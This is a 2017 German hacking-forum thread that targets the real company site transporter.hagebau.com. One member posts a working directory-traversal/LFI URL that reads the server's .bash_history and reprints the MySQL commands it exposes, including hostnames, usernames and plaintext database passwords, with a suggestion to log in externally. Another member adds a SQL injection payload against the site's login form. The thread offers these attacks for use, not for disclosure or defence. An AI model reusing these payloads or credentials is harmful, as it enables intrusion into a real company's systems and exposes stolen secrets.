Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

[LFI] Hagebau.com

- - - - -
Started by Klaus ,
lfi

  • Please log in to reply
4 replies to this topic

#1
Klaus
Posted 22 August 2017 - 23:56 Uhr

Klaus

    Hacktivist

  • Banned
  • PipPipPipPipPip
    • Likes
    34
  • 59 posts
  • 22 Bedankt
  • Android, Android [root]
  • Windows, Linux

Viel spaß!

 

Please Login HERE or Register HERE to see this link!

 

:)


  • hacked, SecurityFlaw and Mini Rick like this
Thanked by 1 Member:
killer555

#2
Zero-X
Posted 23 August 2017 - 13:43 Uhr

Zero-X

    FTB Experte

  • Premium Member
    • Likes
    127
  • 98 posts
  • 45 Bedankt
  • Android
  • Windows, Linux

In der .bash_history stehen auch ein paar interessante Dinge.

URL:

https://transporter.hagebau.com/index.php?site=../../../../.bash_history%00

Beispiel:

mysqldump -h ah-siebrecht.de -u db190100_98 -phag0114Si "db190100_98" > transporter.sql
mysqldump -h mysql5.ah-siebrecht.de -u db190100_98 -phag0114Si "db190100_98" > transporter.sql
mysql -h mysql5.ah-siebrecht.de -u db190100_115 -pGHz8S6Qn --default-character-set=utf8 "db190100_115" < transport.sql
mysql -h mysql5.ah-siebrecht.de -u db190100_115 -pGHz8S6Qn --default-character-set=utf8 "db190100_115" < transporter.sql

Das sind Zugangsdaten zu einer MySQL-Datenbank. Vielleicht besteht die Möglichkeit sich extern einzuloggen.

Im Verzeichnis "./sqladmin" findet man zwar einen phpMyAdmin-Login aber für den braucht man laut Domainfactory das Kundenmenüpasswort.


  • Klaus likes this

#3
Klaus
Posted 23 August 2017 - 13:53 Uhr

Klaus

    Hacktivist

  • Banned
  • PipPipPipPipPip
    • Likes
    34
  • 59 posts
  • 22 Bedankt
  • Android, Android [root]
  • Windows, Linux

Interessant. Ich habe weiter keine Ahnung von LFI's. Leider. :D


#4
ProHex
Posted 26 August 2017 - 02:34 Uhr

ProHex

    Hacker

  • Moderator
    • Likes
    212
  • 219 posts
  • 185 Bedankt

Übersehe ich hier was oder ist das keine inlcusion sondern ein Directory Traversal?


#5
SecurityFlaw
Posted 26 August 2017 - 23:11 Uhr

SecurityFlaw

    ██████████

  • Members
  • PipPipPipPipPipPipPipPipPip
    • Likes
    212
  • 256 posts
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

Falls die DB keinen externen Zugriff zulässt könnte man es hier auch noch versuchen.

 

SQLI:

https://transporter.hagebau.com/index.php?site=login | POST: loginname=xxx123'&password=xxx123&submit_login=anmelden

Edited by SecurityFlaw, 26 August 2017 - 23:11 Uhr.

  • Klaus likes this
Back to  Classic Hacking

  Topic Forum Started By Stats Last Post Info

user(s) are reading this topic

members, guests, anonymous users


This topic has been visited by 61 user(s)


    13fuckthepolice12, 3eyes, aaaaaa, abuleyla, aleks, B1nary, Bulldogge67, clusterhead, CM1, Cryptologic, decent, dep0x, desmond, Dr. Spic, dvalar, elcapitano, Elvisss, Exynos, FatalityMods, Framerater, Franziskaner, gtawelt, hacked, Hansiberg, Haxlor, Haxor33, heycaptain, JohnR, KimJongun, kiwitone, Klaus, kleinkriminell, L!x, Laggy, leonalexkraus, lolorollo, Makiavelic, malicious, MarkSantos, mesagio, Mini Rick, most_uniQue, nibble nibble, p.samson, PadX18, PaulaAbdul, Payload, PHIPU, ProHex, Psykoon303, Schax, SecurityFlaw, SepaX, sitb, Snapfish, SonnyBlack, syncing, TuttiFrutti, VerZus, Zero-X, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.
  1. Toolbase.bz
  2.   Hacking & Security
  3.  Classic Hacking